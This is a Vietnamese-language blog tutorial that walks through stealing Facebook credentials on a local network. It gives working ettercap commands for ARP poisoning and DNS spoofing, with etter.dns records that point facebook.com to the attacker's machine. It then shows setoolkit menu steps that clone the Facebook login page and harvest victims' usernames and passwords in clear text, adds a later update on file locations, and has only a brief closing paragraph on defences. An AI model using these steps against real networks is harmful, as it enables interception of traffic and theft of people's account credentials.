DNS Spoofing – Hack Facebook

Mình xin nói sơ qua về DNS – Domain Name System – Hệ thống phân giải tên miền.

Khi bạn vào web browser gõ facebook.com thì hệ thống DNS sẽ phân giải cho bạn sang địa chỉ IP để bạn có thể giao tiếp, truyền tải dữ liệu trên mạng.

Bài này mình sẽ chia làm 2 phần:

Phần 1: Sử dụng ettercap để thực hiện DNS Spoofing

Phần 2: Sử dụng Setoolkit và Ettercap để thực hiện đánh cắp tài khoản facebook.

Thực hiện:

Phần 1: Sử dụng ettercap để thực hiện DNS Spoofing

Trước tiên, mình sẽ ping facebook.com xem thử địa chỉ IP tương ứng với tên miền facebook.com là gì

 photo facebook_zpsf1b7f07c.jpg

Tiếp đến, vào Kali Linux thực hiện Enable IP Forwarding.

#echo 1 > /proc/sys/net/ipv4/ip_forward

 photo ipforwarding_zps9e90c910.jpg

Tiếp theo sửa file etter.dns.

Sử dụng câu lệnh locate etter.dns xem hiện tại nó đang ở đâu. Xong thì tiến hành vào thêm các record sau:

facebook.com A 192.168.0.109

*.facebook.com A 192.168.0.109

Với địa chỉ 192.168.0.109 là IP máy Attacker.

 photo etterdns_zps6db36b10.jpg

Note: Có thể nằm ở địa chỉ /usr/local/share/ettercap/etter.dns với các phiên bản Backtrack 5

Xong thì lưu lại và thoát :wq

 photo facebook2_zpscdfe6288.jpg

Thực hiện dns spoofing bằng câu lệnh

#ettercap -T -q -M arp:remote -P dns_spoof //

 photo ettercap_zpsac23a3f7.jpg

Sau đó vào máy client, cấp lại địa chỉ bằng câu lệnh >ipconfig /renew

 photo ettercap3_zps6c7aa75f.jpg

Bây giờ lên PC client truy cập vào facebook.com bạn sẽ thấy nó vẫn truy cập bình thường. Nhưng khi tiến hành ping đến facebook.com thì IP trả lời lại là 192.168.0.109 – IP máy Attacker.

 photo pingfacebook2_zps52486770.jpg

OK. Vậy là bạn đã thành công trong việc lái dữ liệu qua máy bạn, giờ chúng ta sẽ tiến hành đánh cắp tài khoản Facebook.

Phần 2: Sử dụng setoolkit và ettercap để thực hiện đánh cắp tài khoản facebook.

Công cụ sử dụng:

setoolkit: clone website, capture username/password

ettercap: Scan hosts + ARP poisoning (ARP spoofing) + DNS spoofing + Sniff (nghe lén).

Video demo: Youtube

Hướng dẫn bằng hình ảnh

Bật setoolkit

#/usr/share/set/setoolkit

Đồng ý điều khoản sử dụng Bấm y -> Enter

 photo setoolkit2_zps3d0fa4a2.jpg

Chọn 1) Social-Engineering Attacks

 photo setoolkit3_zps2970c553.jpg

Chọn 2) Website Attack Ventors

Chọn 3) Credential Harvester Attack Method

Chọn 2) Site Cloner

Đánh địa chỉ IP của Attacker: 192.168.0.109

Đánh đường dẫn muốn clone website: https://www.facebook.com

Xong thì bật Terminal khác, đánh ettercap -G để bật cấu hình ettercap bằng giao diện

Chọn Sniff-> Unified sniffing

Chọn cổng để nghe lén: eth0

Chọn Hosts-> Scan for hosts

Host-> Hosts List

Chọn 2 địa chỉ để tiến hành nghe lén

Thực hiện ARP possoning (ARP spoofing)

Click chọn Sniff remote connections.

Vào /etc/ettercap/etter.dns thêm vào 2 dòng:

facebook.com A 192.168.0.109

*.facebook.com A 192.168.0.109

Vào Plugins-> Manage the plugins

Click vào dns_spoof để bật tính năng này

Start sniffing

Tại máy client mở web browser vào facebook.com, điền username/password

setoolkit sẽ bắt được username/password này

Thông tin username/password hiện dưới dạng clear-text như trên, vậy là bạn đã có tài khoản facebook của client.

Cập nhật ngày 15/9/2015:

Ở phiên bản mới Kali 2.0, khi clone site về sẽ được lưu trong đường dẫn /var/www/ bạn tiến hành copy những file này vào đường dẫn /var/www/html sau đó tiến hành bình thường:

Note: nhớ change quyền để đọc và viết cho các file này:

#cd /var/www/html
#chmod 777 ./*

gồm 3 file là:
– index.html : giao diện của facebook.com
– post.php: hàm để lấy username/password khi bạn nhập vào và lưu ở file haverster_*.txt
– harvester_ngày_giờ.txt : lưu thông tin thu được.

 photo clone1.png

Bằng cách tương tự các bạn có thể đánh cắp nhiều tài khoản khác.

Cách phòng chống DNS Spoofing:

Ngoài 2 cách ở bài ARP spoofing là triển khai port-security và DAI các bạn nên triển khai thêm DHCP snooping để ngăn chặn cấp DHCP giả mạo.

P/s: Như các bạn đã thấy, nếu attacker đã vào được trong mạng nội bộ của chúng ta mà có ý đồ đen tối thì có nhiều công cụ để khai khác thông tin của công ty mình. Như vậy, nếu nhân viên nào có ý đồ phá hoại công ty thì cũng khá vất vả để điều tra.

Nhân tiện đây, bạn nào có sử dụng công cụ hay chương trình giám sát nào bổ ích thì chia sẻ cho anh em biết với nhé.

Thân,